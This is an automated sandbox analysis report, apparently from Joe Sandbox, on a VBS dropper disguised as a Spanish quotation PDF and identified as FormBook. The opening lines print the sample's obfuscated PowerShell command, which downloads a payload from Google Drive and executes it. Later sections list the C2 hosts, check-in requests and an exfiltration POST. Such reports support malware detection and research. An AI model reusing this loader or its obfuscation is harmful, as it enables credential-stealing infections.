              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoophChilmsneseSludd esesRiem.A,biDhar,o HemwMagnnP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:06:58.050106+010028033053Unknown Traffic192.168.2.549709142.250.185.238443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:07:54.666715+010028032702Potentially Bad Traffic192.168.2.563343142.250.185.238443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:08:32.305516+010028554651A Network Trojan was detected192.168.2.56334513.248.169.4880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-10T21:08:52.955612+010028554641A Network Trojan was detected192.168.2.56334684.32.84.3280TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsVirustotal: Detection: 9%Perma Link
              Source: SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: Yara matchFile source: 0000000E.00000002.2574460468.0000000004740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2572546102.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2573699435.0000000000DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2574018901.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2249260744.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2248575840.000000001F830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2573960761.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:63343 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.5:63344 version: TLS 1.2
              Source: Binary string: findstr.pdbGCTL source: msiexec.exe, 0000000D.00000003.2202873633.0000000003F9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2304963221.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2577331213.000000000554C000.00000004.80000000.00040000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.000000000088D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574674617.000000000344C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2533613166.00000000306BC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: poqexec.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2173806414.0000000000D14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: poqexec.pdbGCTL source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2173806414.0000000000D14000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msiexec.pdbGCTL source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2577331213.000000000554C000.00000004.80000000.00040000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.000000000088D000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574674617.000000000344C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2533613166.00000000306BC000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: tem.Core.pdb source: powershell.exe, 00000009.00000002.1952432102.0000000008520000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E763D2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: findstr.pdb source: msiexec.exe, 0000000D.00000003.2202873633.0000000003F9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000003.2304963221.0000000000D1B000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000D.00000003.2129060587.000000001F6E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FA50000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2131397423.000000001F89B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FBEE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2235634912.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2233811191.000000000098A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 0000000D.00000003.2129060587.000000001F6E3000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FA50000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2131397423.000000001F89B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2248670158.000000001FBEE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000010.00000002.2574280134.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2235634912.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2574280134.0000000002FBE000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2233811191.000000000098A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: b.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E7642B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000004.00000002.1569801243.0000022E7642B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb_s#t source: powershell.exe, 00000009.00000002.1952432102.0000000008520000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2573228695.0000000000BDF000.00000002.00000001.01000000.00000008.sdmp
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003CC830 FindFirstFileW,FindNextFileW,FindClose,16_2_003CC830

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 4x nop then pop edi14_2_00E0D065
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 4x nop then xor eax, eax14_2_00E1299E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 4x nop then pop edi14_2_00E0F11A
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 4x nop then pop edi14_2_00E0DD5A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then xor eax, eax16_2_003BA100
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then pop edi16_2_003BE473
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 4x nop then mov ebx, 00000004h16_2_02C704E8

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:63345 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:63346 -> 84.32.84.32:80
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: global trafficTCP traffic: 192.168.2.5:63338 -> 1.1.1.1:53
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684 HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 142.250.185.238:443
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:63343 -> 142.250.185.238:443
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684 HTTP/1.1Host: drive.google.com
              Source: global trafficHTTP traffic detected: GET /download?id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /download?id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /mkxv/?eXOHnd=MK0ShD/VOT+mjwSUg6UXWJ1xunIFd6dhUarXaHeYlCN0x3qiLyvXgNTQnyE27cakbqtkm7ZzmuQjHRMwfybJi7SxDTb33uf+ERS6QnBR50iPxsPA5QvreV2HDmZaobDhzQ==&ina=lZLpQfth HTTP/1.1Host: www.matrixfitness.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]
              Source: global trafficDNS traffic detected: DNS query: Host_6637.6637.6637.657e
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: www.matrixfitness.org
              Source: global trafficDNS traffic detected: DNS query: www.natividade.tech
              Source: unknownHTTP traffic detected: POST /3szq/ HTTP/1.1Host: www.natividade.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.natividade.techConnection: closeContent-Length: 207Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.natividade.tech/3szq/User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36 [Pinterest/Android]Data Raw: 65 58 4f 48 6e 64 3d 69 58 74 77 61 41 58 46 43 73 68 62 59 7a 62 34 58 4d 35 4e 31 43 4c 63 54 76 61 66 52 57 56 4f 64 59 48 6f 32 65 63 49 4c 35 34 6a 55 50 57 30 4f 56 5a 46 53 31 6c 74 2b 5a 32 79 63 37 4c 7a 66 41 69 39 2f 43 4f 4e 69 70 66 51 6f 30 44 67 52 67 68 67 65 2b 37 4a 51 39 32 4f 77 71 51 50 32 71 37 79 66 2f 71 76 67 64 38 53 37 2f 41 45 34 6c 72 74 6f 43 6a 5a 45 68 33 75 4c 35 73 6a 79 74 59 6c 78 6d 74 32 6e 76 65 59 68 61 4e 61 72 2b 66 4e 70 56 4a 2b 52 41 50 38 4d 31 62 45 6b 5a 4e 38 6b 46 77 61 52 54 6f 51 4b 30 57 49 79 71 4c 47 73 49 2b 56 7a 78 5a 77 76 70 36 35 57 62 30 38 2b 70 45 3d Data Ascii: eXOHnd=iXtwaAXFCshbYzb4XM5N1CLcTvafRWVOdYHo2ecIL54jUPW0OVZFS1lt+Z2yc7LzfAi9/CONipfQo0DgRghge+7JQ92OwqQP2q7yf/qvgd8S7/AE4lrtoCjZEh3uL5sjytYlxmt2nveYhaNar+fNpVJ+RAP8M1bEkZN8kFwaRToQK0WIyqLGsI+VzxZwvp65Wb08+pE=
              Source: wscript.exe, 00000001.00000002.1297264559.0000013607DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1294960689.0000013607DBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1295977195.0000013607DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab~
              Source: wscript.exe, 00000001.00000002.1297264559.0000013607DCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1294960689.0000013607DBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1295977195.0000013607DCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enW
              Source: powershell.exe, 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DBB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1916265000.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000009.00000002.1942090148.00000000074F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2573699435.0000000000E58000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.natividade.tech
              Source: mAV1geIoraZWu3gOV6nu2g.exe, 0000000E.00000002.2573699435.0000000000E58000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.natividade.tech/3szq/
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DBB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000009.00000002.1916265000.0000000004861000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.g
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.go
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goo
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.goog
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googl
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.c
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.co
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5DDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
              Source: msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ga
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/u
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?e
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?ex
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?exp
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expor
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=d
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=do
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=down
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downl
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downlo
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=downloa
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&i
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1G
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gf
